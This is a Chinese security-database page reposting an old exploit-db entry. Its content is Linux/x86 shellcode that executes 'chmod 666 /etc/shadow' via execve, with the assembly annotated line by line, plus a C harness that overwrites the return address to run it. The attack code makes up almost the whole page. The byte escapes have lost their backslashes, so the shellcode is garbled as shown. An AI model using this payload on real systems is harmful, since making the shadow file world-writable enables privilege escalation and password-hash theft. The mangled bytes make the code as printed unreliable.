Linux/x86 – chmod 666 /etc/shadow Shellcode (82 bytes)-安全小百科

Linux/x86 – chmod 666 /etc/shadow Shellcode (82 bytes)

漏洞ID	1054652	漏洞类型
发布时间	2004-09-26	更新时间	2004-09-26
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	Linux_x86	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/13442

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

/* 
 * [email protected]
 * 
 * Usando execve() y un array de punteros
 * 
 *  #include <stdio.h>
 *  main() {
 *       char *name[4];
 *       name[0]="/bin/chmod";
 *       name[1]="666";
 *       name[2]="/etc/shadow";
 *       name[3]=NULL;
 *       execve(name[0],name,NULL);
 *  }
 */

#include <stdio.h>

char shellcode[]=
"xebx31"		//	jmp	0x31			// 3-4
"x5e"			//	popl	%esi			// 5
"x31xc0"		//	xorl	%eax, %eax		// 6-7
"x88x46x0a"		//	movb	%al, 0xa(%esi)		// 8-10
"x88x46x0e"		//	movb	%al, 0xe(%esi)		// 11-13
"x88x46x1a"		//	movb	%al, 0x1a(%esi)		// 14-16
"x89x76x1b"		//	movl	%esi, 0x1b(%esi)	// 17-19
"x8dx7ex0b"		//	leal	0xb(%esi), %edi		// 20-22
"x89x7ex1f"		//	movl	%edi, 0x1f(%esi)	// 23-25
"x8dx7ex0f"		//	leal	0xf(%esi), %edi		// 26-28
"x89x7ex23"		//	movl	%edi, 0x23(%esi)	// 29-31
"x89x46x27"		//	movl	%eax 0x27(%esi)		// 32-34
"xb0x0b"		//	movb	$0xb, %al		// 35-36 0xb to eax (syscall execve)
"x89xf3"		//	movl	%esi, %ebx		// 37-38 name[0] to ebx
"x8dx4ex1b"		//	leal    0x1b(%esi),%ecx		// 39-41
"x8dx56x27"		//	leal    0x27(%esi),%edx		// 42-44
"xcdx80"		//	int	$0x80			// 45-46
"x31xc0"		//	xorl	%eax, %eax		// 47-48
"x31xdb"		//	xorl    %ebx, %ebx		// 49-50
"x40"			//	inc	%eax			// 51
"xcdx80"		//	int	$0x80			// 52-53
"xe8xcaxffxffxff"	//	call	-0x36
"/bin/chmod06660/etc/shadow";

main() {
        int *ret;
        ret=(int *)&ret +2;
        printf("Shellcode lenght=%dn",strlen(shellcode));
        (*ret) = (int)shellcode;
}

// milw0rm.com [2004-09-26]

相关推荐: Nucleus CMS Action.PHP SQL Injection Vulnerability

Nucleus CMS Action.PHP SQL Injection Vulnerability 漏洞ID 1098209 漏洞类型 Input Validation Error 发布时间 2004-07-26 更新时间 2004-07-26 CVE编号 …

文章版权归作者所有，未经允许请勿转载。

THE END